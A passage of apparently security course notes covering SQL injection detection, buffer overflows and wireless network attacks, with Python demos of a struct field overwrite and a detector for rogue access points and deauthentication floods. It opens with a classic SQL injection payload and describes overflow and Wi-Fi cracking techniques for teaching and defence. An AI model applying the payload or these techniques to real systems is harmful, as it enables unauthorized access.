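With the vulnerable version the executed text is `... username='x' AND password='' OR '5'='5'`, which matches every row, and the first row returned is the administrator. Storing passwords in clear text, as this toy table does, is a second defect the example keeps only to stay close to the slide; a real system stores a salted hash and compares against it in application code.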
How to Detect SQL injection
Vulnerabilities?
• To detect SQL injection vulnerabilities, you can start by performing input
validation testing, where special characters like ' or " are inserted into
inputs to see if they cause errors.
• Automated tools like SQLMap or Burp Suite can scan for vulnerabilities
by simulating attacks.
• Reviewing the source code helps identify insecure practices, such as using
dynamic SQL queries without proper parameterization.
• Monitoring for unexpected database error messages can reveal potential
issues.
• Finally, conducting thorough penetration testing, including both black-
box and white-box methods, provides a comprehensive assessment of
security weaknesses.
Buffer Overflow
 A buffer overflow occurs when a program writing data to a
buffer overloads that buffer's capacity. It's like pouring 12
ounces of milk into an 8 ounce glass.
 A buffer overflow attack is a common cyberattack that
deliberately exploits a buffer overflow vulnerability
where user-controlled data is written to memory. By
submitting more data than can fit in the allocated
memory block, the attacker can overwrite data in other
parts of memory.
 Attackers perform buffer overflow attacks for various
reasons: overwriting critical code or data to crash the
program, placing their own code in memory and redirecting
execution to it, or modifying critical values such as flags,
pointers or return addresses to change the program's
control flow.
Buffer Overflow Threat
 Buffer overflow attacks can be used to achieve various objectives,
including:
• Denial of Service (DoS) Attacks: Within an application’s memory
space are pointers, code, and other pieces of data that are critical
to the program’s ability to execute. Overwriting this data could
cause the program to crash, resulting in a DoS attack.
• Code Execution: A common goal of buffer overflow exploits is to
force the vulnerable application to execute attacker-provided
code. This allows the attacker to run code on the affected
system with the same access and permissions as the exploited
application.
• Access Control Bypasses: Exploitation of buffer overflows to run
code can elevate an attacker’s access to a target system. This
expanded access can then be used to perform follow-on attacks.
Types of Buffer Overflow Attacks
• Stack-Based Buffer Overflow: The program stack holds critical control
flow data for an application, such as saved function return addresses, and
is a common target of buffer overflow attacks. Overwriting a saved return
address can make the program jump to attacker-controlled data and execute
it as code, so the attacker runs code with the same permissions as the
application.
• Heap-Based Buffer Overflow: The heap holds memory allocated at run time
for data whose size is not known when the program is compiled. Overrunning
a heap buffer lets an attacker overwrite neighbouring application data or
the allocator's own bookkeeping, either of which can be turned into
control of the program.
• Format String Attacks: Functions in the printf family in C/C++ can use
format strings, which allow reading and writing of memory. If user-
provided data is interpreted as a format string, it can be used to leak or
How to Prevent Buffer Overflows
• Performing Input Validation: Buffer overflow vulnerabilities
occur when a program makes assumptions about user-
provided input without validating these assumptions.
Checking the length of data or only copying a certain number
of bytes to a memory location can help avoid buffer overflows.
• Enabling Runtime Memory Protection: Modern operating systems and
compilers provide protections such as Address Space Layout
Randomization (ASLR), Data Execution Prevention (DEP, also called NX),
stack canaries and, on Windows, Structured Exception Handling
Overwrite Protection (SEHOP). Building with these enabled and leaving
them on makes buffer overflows much harder to exploit, although they
do not remove the underlying bug.
• Avoiding Vulnerable Functions: Buffer overflows are made possible by
functions that do not know how large the destination is, such as gets,
scanf with a bare %s, strcpy and sprintf in C/C++. Use bounded
alternatives with an explicit size instead (fgets, snprintf, strlcpy
where available, or memcpy after checking the length). Note that
strncpy does not NUL-terminate on truncation and is not a drop-in fix.
• Using Memory-Safe Languages: Buffer overflows occur in languages that
do not check array bounds at run time, chiefly C and C++. Languages
such as Python, Java or C# check every access, which makes buffer
overflows difficult or impossible outside of native extensions and
explicitly unsafe code.
• Preventing Vulnerability Exploitation: Web application
firewalls (WAFs) and Web Application and API
Protection (WAAP) solutions can identify and block attempted
exploitation of buffer overflow vulnerabilities that arrive over
HTTP. This reduces, but does not remove, the risk that buffer
overflow attacks pose to corporate application security (AppSec).
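The adjacent-field overwrite described under "Buffer Overflow", together with the length check recommended above, as an added example that is not from the slides. Python cannot overflow its own buffers, so the example uses a ctypes structure that mirrors an assumed C record, struct session { char name[8]; int is_admin; }, and reproduces what strcpy does (copy the source plus its terminator with no regard to the destination size). The write is deliberately capped at the size of the struct so that the demo corrupts only the record and not the interpreter's heap:

```python
import ctypes

NAME_LEN = 8


class Session(ctypes.Structure):
    """Mirror of the assumed C layout. ctypes uses C alignment rules, so the
    int is_admin starts immediately after the 8-byte name buffer."""
    _fields_ = [("name", ctypes.c_char * NAME_LEN),
                ("is_admin", ctypes.c_int)]


def spill_offset():
    """Bytes that can be written into name[] before is_admin is hit."""
    return Session.is_admin.offset - Session.name.offset


def set_name_unbounded(session, src):
    """The strcpy() pattern: copy src and its NUL terminator starting at
    name[0], however long src is. Bytes 9 onward land on is_admin.
    Capped at sizeof(session) purely to keep this demonstration safe."""
    data = src + b"\x00"
    if len(data) > ctypes.sizeof(session):
        raise RuntimeError("demo keeps the overflow inside the struct")
    ctypes.memmove(ctypes.addressof(session), data, len(data))


def set_name_bounded(session, src):
    """Hardened form: validate the length against the buffer before copying,
    leaving room for the terminator. This is what the 'safe versions' of the
    C string functions do for you when given the right size argument."""
    if len(src) >= NAME_LEN:
        raise ValueError("name longer than %d bytes" % (NAME_LEN - 1))
    session.name = src          # ctypes pads the rest of the field with NUL
    return True


def overflow_demo(src):
    """is_admin after an unbounded copy of src into a zero-initialised record."""
    s = Session()               # every field starts at zero
    set_name_unbounded(s, src)
    return s.is_admin


def bounded_rejects(src):
    """True if the length check refuses src."""
    try:
        set_name_bounded(Session(), src)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print("is_admin sits", spill_offset(), "bytes after name[]")
    print("is_admin after 'alice'    :", overflow_demo(b"alice"))
    print("is_admin after 'AAAAAAAAB':", overflow_demo(b"AAAAAAAAB"))
    print("bounded setter rejects it :", bounded_rejects(b"AAAAAAAAB"))
```

Five bytes fit and leave is_admin at 0; nine bytes overwrite its first byte with 'B', so the zero-initialised flag becomes non-zero (66 on a little-endian machine) and the record now claims administrator rights. The bounded setter refuses the same input before anything is written.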
Attack on Wireless Networks
Wireless network attacks are deliberate and malicious
actions aimed at exploiting vulnerabilities in wireless
communication systems to gain unauthorized access,
intercept sensitive data, disrupt network operations, or
compromise the security of devices and users connected
to the network. These attacks target weaknesses in the
protocols, configurations, or encryption mechanisms of
wireless networks, taking advantage of their inherent
nature of broadcasting signals over the airwaves.
Types of Wireless Network Attacks
 1. Wireless Eavesdropping (Passive Attacks)
 Attackers use tools like packet sniffers to intercept and monitor
wireless communications between devices. By capturing data packets
transmitted over the air, they can potentially obtain sensitive
information, such as login credentials, financial data, or personal
information.
 2. Wireless Spoofing (Man-in-the-Middle Attacks)
 In these attacks, the attacker positions themselves between the
wireless client and the legitimate access point, intercepting and
manipulating data transmissions. The attacker may then relay the
information back and forth, making it appear as if they are the
legitimate access point. This enables them to snoop on data or perform
other malicious actions unnoticed.
 3. Wireless Jamming (Denial-of-Service Attacks)
 Attackers flood the wireless frequency spectrum with
interference signals, disrupting legitimate communications
between devices and access points. By creating excessive
noise, they can render the wireless network unusable for
legitimate users.
 4. Rogue Access Points
 Attackers set up unauthorized access points, mimicking
legitimate ones, to deceive users into connecting to them.
Once connected, the attacker can eavesdrop, capture data, or
launch further attacks on the unsuspecting users.
 5. Brute-Force Attacks
 Attackers try various combinations of passwords or
encryption keys in rapid succession until they find the correct
one to gain unauthorized access to the wireless network.
 6. WEP/WPA Cracking
 Attackers exploit weaknesses in older Wi-Fi security protocols.
Wired Equivalent Privacy (WEP) uses RC4 with short, reused
initialization vectors, so its key can be recovered from a few tens
of thousands of captured frames in minutes. Against Wi-Fi Protected
Access with a pre-shared key (WPA and WPA2-Personal), the attacker
captures the four-way handshake and runs an offline dictionary or
brute-force attack on the passphrase; a short or common passphrase
falls quickly, a long random one does not.
 7. Evil Twin Attacks
 Attackers create fake access points with names similar to
legitimate ones, tricking users into connecting to the malicious
network. Once connected, the attacker can intercept sensitive
data or execute further attacks.
 8. Deauthentication/Disassociation Attacks
 Attackers send forged deauthentication or disassociation
management frames to wireless devices, forcing them to disconnect
from the network. This causes service disruption and is also used to
make a client reconnect so that its WPA handshake can be captured, or
to push it onto an evil twin. The frames can be forged by any nearby
radio because they are unauthenticated unless 802.11w Protected
Management Frames (PMF) is enabled on both the access point and the
client.
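Three of the attacks above (rogue access points and evil twins, deauthentication floods, and networks still on weak or no encryption) leave traces in the management frames a monitor-mode capture sees. The following is an added example, not from the slides, of detection logic run over a constructed list of frame summaries; the tuple layout (time, frame type, SSID, BSSID, security) and the inventory of "our" access points are assumptions for the example and not the export format of any particular capture tool:

```python
from collections import defaultdict

# Constructed frame summaries standing in for a short monitor-mode capture:
# (time_seconds, frame_type, ssid, bssid, security). Layout is assumed.
FRAMES = [
    (0.00, "beacon", "CorpWiFi",   "aa:bb:cc:00:00:01", "WPA2-CCMP"),
    (0.10, "beacon", "Guest",      "aa:bb:cc:00:00:02", "WPA2-CCMP"),
    (0.20, "beacon", "CorpWiFi",   "de:ad:be:ef:00:01", "OPEN"),  # our name, unknown radio
    (0.30, "beacon", "OldPrinter", "aa:bb:cc:00:00:03", "WEP"),
    (0.40, "deauth", None,         "aa:bb:cc:00:00:02", None),   # a single, normal deauth
]
# 30 deauthentication frames from one BSSID in just over half a second.
FRAMES += [(1.0 + i * 0.02, "deauth", None, "aa:bb:cc:00:00:01", None)
           for i in range(30)]

# Inventory of the access points we actually operate (assumed).
KNOWN_APS = {
    "CorpWiFi": {"aa:bb:cc:00:00:01"},
    "Guest":    {"aa:bb:cc:00:00:02"},
}


def find_rogue_aps(frames, known):
    """Evil twin / rogue AP: a beacon advertising one of our SSIDs from a
    BSSID that is not in the inventory for that SSID."""
    found = set()
    for _, ftype, ssid, bssid, _ in frames:
        if ftype == "beacon" and ssid in known and bssid not in known[ssid]:
            found.add((ssid, bssid))
    return sorted(found)


def find_deauth_floods(frames, window=1.0, threshold=10):
    """Deauth flood: at least `threshold` deauth frames from one BSSID
    inside some sliding window of `window` seconds. A lone deauth is
    normal; dozens per second is a jammer. Returns {bssid: peak_count}."""
    times = defaultdict(list)
    for t, ftype, _, bssid, _ in frames:
        if ftype == "deauth":
            times[bssid].append(t)
    floods = {}
    for bssid, ts in times.items():
        ts.sort()
        peak, start = 0, 0
        for end in range(len(ts)):
            while ts[end] - ts[start] > window:   # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            floods[bssid] = peak
    return floods


def find_weak_security(frames):
    """Audit: networks advertising no encryption, WEP, or TKIP."""
    weak = set()
    for _, ftype, ssid, bssid, sec in frames:
        if ftype == "beacon" and (sec in ("OPEN", "WEP") or "TKIP" in sec):
            weak.add((ssid, bssid, sec))
    return sorted(weak)


if __name__ == "__main__":
    print("rogue / evil twin APs:", find_rogue_aps(FRAMES, KNOWN_APS))
    print("deauth floods        :", find_deauth_floods(FRAMES))
    print("weak security        :", find_weak_security(FRAMES))
```

The rogue check is keyed on SSID plus BSSID because an evil twin copies the name but cannot usually copy the legitimate radio's address without also jamming it; the flood check uses a sliding window rather than a fixed per-second bucket so that a burst straddling a second boundary is not missed.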
Preventing Wireless Network Attacks:
Safeguarding Your Digital Domain
 1. Update your devices often
 Regularly update your operating system and applications, and the
firmware of your router or access point, to ensure you have the latest
security patches and fixes. Timely updates close discovered
vulnerabilities, making it harder for attackers to exploit known
weaknesses.
 2. Use MAC filtering
 Enabling MAC filtering on your wireless router limits which devices may
associate, based on their MAC addresses. It is at best a minor hurdle:
MAC addresses are sent in the clear in every frame and can be changed in
software, so an attacker who observes an allowed client can impersonate
it. Treat filtering as housekeeping, not as access control.
 3. Disable SSID (Service Set Identifier) broadcasting
 Turning off SSID broadcasting removes the network name from beacon
frames, so casual scans do not list it. It does not hide the network:
clients of a hidden network send the SSID in probe requests and
association frames, where any sniffer can read it, so treat this as
obscurity rather than security.
 4. Use WPA2 or WPA3 encryption
 Use WPA2 with AES-CCMP at minimum, with TKIP disabled, and WPA3
where your devices support it; WPA3 (released in 2018) is the current
protocol and WPA2 remains acceptable when paired with a long, random
passphrase. Encryption ensures that even if traffic is intercepted,
your data remains unintelligible to unauthorized entities.
 5. Change the default SSID
 Customize your router’s SSID to something unique and
unrelated to personal information. Avoid using common
names like “Linksys” or “default” to deter attackers from
identifying and targeting your network.
 6. Disable file sharing
 Turn off file sharing on your network to prevent
unauthorized users from accessing your sensitive files. If file
sharing is necessary, ensure you set up secure passwords to
limit access to approved users only.
 7. WEP encryption (legacy routers only)
 If your router cannot do WPA2 (Wi-Fi Protected Access), WEP
(Wired Equivalent Privacy) is the only option left, but it is
cryptographically broken: the key can be recovered from captured
traffic in minutes with freely available tools. Treat a WEP network
as an open one, do not place anything sensitive on it, and replace
the hardware rather than rely on it.